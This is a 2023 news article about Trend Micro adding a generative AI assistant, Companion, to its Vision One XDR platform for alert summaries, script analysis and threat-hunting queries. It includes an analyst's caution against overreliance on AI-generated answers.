Americas

  • United States

Asia

Oceania

mhill
UK Editor

Trend Micro adds generative AI to Vision One for enhanced XDR

News
Jun 19, 20235 mins
Data and Information SecurityGenerative AISecurity Software

New generative artificial intelligence tool Companion is designed to amplify security operations, improve accessibility and efficiency, and quicken threat hunting speeds for analysts.

1887170134 attack surface programming abstract
Credit: whiteMocca / Shutterstock

Trend Micro has announced the integration of generative AI into its flagship Vision One platform with the new AI tool, Companion. Co`mpanion uses advanced AI/machine learning analytics and correlated detection models to enhance extended detection and response (XDR) capabilities, according to the cybersecurity vendor. It has been designed to amplify security operations, improve accessibility and efficiency, and quicken threat hunting speeds for analysts of varying skill levels, Trend Micro claimed in a press release. The release marks the initial phase of a multi-quarter rollout of AI and large language model (LLM) capabilities embedded within Vision One, it added.

Generative AI- and LLM-enhanced security threat detection and response is a prevalent trend in the cybersecurity market right now as different vendors incorporate the technology in attempts to help make their products smarter, quicker, and more concise.

Companion works with Vision One security platform

Companion works in harmony with the broader Vision One platform to enhance XDR alerts by facilitating quicker understanding and more effective threat filtering, as well as contextualized AI-driven recommendations for security events, wrote Shannon Murphy, risk and threat specialist at Trend Micro, in a blog detailing Companion’s capabilities.

Companion uses a plain-language interface to empower users of varying skill levels with generative AI’s analytical capabilities to explain and contextualize alerts, triage and recommend actions, decode complex scripts, and develop and test search queries, Murphy added. Users can also control when they utilize Companion’s assistance, ensuring more experienced team members can continue their existing workflow seamlessly with or without support, she said.

Companion summarizes attacks, analyzes scripts, builds threat-hunting queries

Companion can provide security analysts with plain-language summaries of complex multi-step, multi-layer attacks. Previously, this volume of information could overwhelm an analyst with an excessive amount of data and information.

“Now, a security analyst can easily prompt Companion for a plain-language summary of the event and receive a comprehensive breakdown explaining the attack, correlating the tactics and techniques, and surfacing the scope and impact to inform the analyst to immediately orchestrate an effective response, and inform new automated playbooks in the future,” Murphy wrote. At the same time, Companion alleviates the requirement for paperwork and reporting with automated email, help-desk ticketing, and incident reporting automation to streamline incident response workflows, Murphy said.

In the scenario of a PowerShell script, Companion can be prompted to analyze and break down the script into individual command lines, identify command line components, interpret the purpose, and intended action, and then generate a human-readable and user-friendly explanation, according to Murphy. “Working in tandem with XDR, the analyst becomes aware of the potential threat implications and the necessary context to prioritize and respond.”

As for hunting queries and search languages, which can be challenging for analysts to master due to their complexity, Companion’s plain-language interface can build sophisticated queries to hunt for threats with greater accuracy and with fewer errors, Murphy said. “By transforming plain-language search queries into formal syntax, analysts at any skill level can now rapidly execute queries to return more accurate results.”

AI/LLM capabilities prioritize security, prevent mixing of instances and training data

Trend Micro’s new generative AI and LLM capabilities have been built to prioritize security and compliance in line with the requirements of this emerging technology, including stringent measures to ensure visibility of how each model handles corporate data, according to the company.

Furthermore, additional controls and isolation mechanisms are implemented to prevent the mixing of Trend’s LLM with instances and training data from other vendors, it said. This will be of particular interest to security leaders, given widespread concerns about the potential risks involved with sharing sensitive and confidential business information with self-learning AI platforms.

Overreliance on AI-generated content a potential pitfall

The release brings Trend Micro truly into the next-generation protection capabilities for organizations and will accelerate reducing the gap between identifying an exposure and remediating the exposure, Philip Harris, research director at IDC, tells CSO. “This new platform raises the bar in reducing complexity and bringing simplicity not only technology-wise but for the all-important analyst on the back end that has to deal with the million and one things in near-to-real-time.”

However, there is a potential pitfall where analysts may become too reliant upon generative AI to provide answers, Harris says. “If analysts become too reliant upon the AI for answers, who is to say the answers are correct all the time? Analysts still need to possess the critical thinking skills to know whether an AI-generated answer is the right answer or is ‘off’ in some way.” The ability to spot whether something amiss or doesn’t “smell right” is still a valued skillset for analysts to continue developing and deepening, he adds. “There could be a day in the not-too-distant future where we may be able to rely more heavily on AI to provide a high level of accuracy or point us in the right direction and Trend has provided a platform where analysts today can leverage their skillsets more than ever before to tune and calibrate this new and valuable AI resource while, at the same time, accelerate their ability to address issues.”